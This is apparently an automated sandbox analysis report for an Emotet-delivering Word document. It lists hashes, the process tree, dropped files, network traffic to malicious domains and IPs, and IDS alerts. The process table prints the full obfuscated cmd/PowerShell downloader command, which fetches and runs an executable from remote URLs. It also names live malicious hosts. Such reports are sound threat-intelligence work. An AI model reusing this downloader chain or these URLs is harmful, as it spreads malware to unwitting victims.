File name: | 0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e |
Full analysis: | https://app.any.run/tasks/01ba75ba-2627-47e5-ba34-1b1c781c50ef |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | November 14, 2018, 12:14:37 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Author: Luke-PC, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Nov 13 10:48:00 2018, Last Saved Time/Date: Tue Nov 13 10:48:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0 |
MD5: | DC67B408334690FB81B8B4AAFCEDD000 |
SHA1: | E3AE09C744D827176E31F2C5BBCBE4AC0D13093A |
SHA256: | 0A6D1812559D81C236C495EF207E3C34949312467C424D31720A857F2495E67E |
SSDEEP: | 1536:bjG+ocn1kp59gxBK85fBt+a9kJ38F7lE+753uZ4JnLJ38F7lr1wXQt39C1OXUZ22:nu41k/W486J38F7lE+753uZ4JnLJ38FI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 14 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 13 |
Words: | 2 |
Pages: | 1 |
ModifyDate: | 2018:11:13 10:48:00 |
CreateDate: | 2018:11:13 10:48:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | Luke-PC |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1716 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\0a6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3868 | CMD /c c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | C:\Windows\system32\CMD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2712 | c:\WInDowS\sySteM32\CMd.exE /C "seT fhc=sV jq9Ih ( [CHAR[] ]"))63]rAHC[,)68]rAHC[+801]rAHC[+37]rAHC[(EcAlper-421]rAHC[,'8IU' ECALPeRc-93]rAHC[,)25]rAHC[+911]rAHC[+101]rAHC[( ECALPeRc- )')4we4wenI'+'Oj-]52,'+'42,4'+'[cePSMoc:vNE'+'VlI ( .8IU '+')}'+' )(Dne'+'otDAeR.'+'_VlI{hcaEROf 8IU }'+') iicSa::]g'+'NIDOcne.TXet['+',_V'+'lI(Red'+'AeRMAE'+'R'+'ts.oI tCe'+'jbo-weN {HcA'+'ERof 8IU )sseRpMoCEd::'+']'+'EdoMn'+'Oi'+'SSERpmOC.N'+'oISserp'+'moc.'+'oI.mEt'+'SyS'+'[,) '+'4weLgf8D'+'rKLIhl4'+'2oHPI6re'+'RdKSb'+'U7sTVB'+'2Jl8V/4sGRlTZthhNP'+'K'+'2tScg'+'9sdg'+'uNcKJKfinCO'+'k'+'qL2VjVqIgsnxR86k9L'+'Sve'+'tLUAb'+'D'+'TE'+'UK3'+'xIrya73'+'fosI5ZyFUXk'+'qTHFmW3'+'s'+'X'+'Kf063Nm9CkIopw'+'SD'+'O8'+'Z'+'Pj0D'+'Ci'+'3hx6qMB'+'B7kMaZCIKC/9+pa/shTRyxV11bZe'+'Xc6d2za4cX'+'tZDV+'+'uoQaLKQoR7'+'fW8HHWLcsSpc3LVFS'+'UfhhO1tX49'+'n3'+'ElZL'+'8Bu95CmQ'+'e'+'A3GiWxo0sc9QC'+'F'+'YWFr8TwO'+'g'+'vZ'+'SBNwn2QG'+'Ymm/WGv8yD8'+'e'+'undDsw'+'L+O/FhhnWnkpNGX7k2dk4wW'+'3OOnJoLohBafD'+'TyVU'+'C8iS/'+'bIFwI8adBZV4we(gnirTs4'+'6ESaBMORF::]trevn'+'Oc.'+'Metsys[]MAE'+'Rt'+'SYro'+'MEM.'+'oi'+'[ ('+'mae'+'rt'+'sETaLfE'+'D.noissER'+'P'+'m'+'OC'+'.Oi.'+'M'+'E'+'TSYs'+' tCejbo-'+'we'+'N('((()''nIOj-]52,42,4[cepsMoc:vNE$ (." ); [ARray]::rEvERsE( $jQ9iH);IEx( -JOIN$jQ9iH ) && poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( ^& ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) )" | c:\WInDowS\sySteM32\cmd.exe | — | CMD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2292 | poWErSHeLL SeT-iTEM (\"v\" + \"ARiablE\" + \":5Pv\" ) ( [typE]( \"{3}{0}{2}{1}\" -f'NVi','ONmeNt','r','E' ) ) ; ( & ( \"{1}{2}{0}\"-f'e','variA','Bl' ) ( \"{1}{0}\" -f '*Xt','Ex') -vAlUEONLY ).\"I`NvO`KE`coMmaND\".\"in`VoKes`c`RIpt\"( ( $5PV::( \"{1}{2}{5}{3}{4}{0}\"-f 'ble','GETEn','V','ONME','NTvARiA','iR' ).Invoke( 'FHC',( \"{2}{0}{1}\"-f'roc','eSs','p' )) ) ) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2692 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | — | powershell.exe |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
3840 | "C:\Users\admin\AppData\Local\Temp\960.exe" | C:\Users\admin\AppData\Local\Temp\960.exe | 960.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
1812 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | 960.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Exit code: 0 Version: 6.2.9200. | ||||
1464 | "C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe" | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | lpiograd.exe | |
User: admin Company: Micr Integrity Level: MEDIUM Version: 6.2.9200. |
PID | Process | Filename | Type | |
---|---|---|---|---|
1716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR96DC.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\Q84N7XXIOCVOI9U8MKT1.temp | — | |
MD5:— | SHA256:— | |||
3840 | 960.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\lpiograd.exe | executable | |
MD5:712B603FFF614230B27D6B2B15F4440E | SHA256:9155A2F84C7A36F27DEAA0A3F63BBCB426ACE329E10EDCBE7D9A8AA8A20CB133 | |||
2292 | powershell.exe | C:\Users\admin\AppData\Local\Temp\960.exe | executable | |
MD5:712B603FFF614230B27D6B2B15F4440E | SHA256:9155A2F84C7A36F27DEAA0A3F63BBCB426ACE329E10EDCBE7D9A8AA8A20CB133 | |||
1716 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D01CA1EBAE094E9B94B62FE2E8E6B18C | SHA256:64C23A325019296C94D75B4C8C29C932798431B8B257A13D0E63636B3DE68C04 | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF5da256.TMP | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 | |||
1716 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$6d1812559d81c236c495ef207e3c34949312467c424d31720a857f2495e67e.doc | pgc | |
MD5:BFEEFB5318B729192181F914BC04372E | SHA256:92E49589FE220E3B319E89C4F492676C77224BDEEF6F8137AE4F2932B28DE0BC | |||
2292 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:3C6A7AAE234382390B6B52F47ECA1BAA | SHA256:C8D6BF40DC644B318B2D69E1A1CD3EC9CCFDED8ADE326D33CFAA2C4E3187FCD2 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
1464 | lpiograd.exe | GET | — | 83.110.100.209:443 | http://83.110.100.209:443/ | AE | — | — | malicious |
2292 | powershell.exe | GET | 200 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX/ | US | executable | 448 Kb | malicious |
2292 | powershell.exe | GET | 301 | 72.9.110.98:80 | http://www.naimalsadi.com/tqX | US | html | 617 b | malicious |
2292 | powershell.exe | GET | 401 | 31.220.125.13:80 | http://www.bluepuma.at/97Hf4F | DE | html | 381 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2292 | powershell.exe | 31.220.125.13:80 | www.bluepuma.at | Mittwald CM Service GmbH und Co.KG | DE | malicious |
1464 | lpiograd.exe | 83.110.100.209:443 | — | Emirates Telecommunications Corporation | AE | malicious |
2292 | powershell.exe | 72.9.110.98:80 | www.naimalsadi.com | Access Integrated Technologies, Inc. | US | malicious |
Domain | IP | Reputation |
---|---|---|
www.bluepuma.at |
| malicious |
www.naimalsadi.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2292 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Generic Trojan Emotet downloader |
2292 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2292 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2292 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |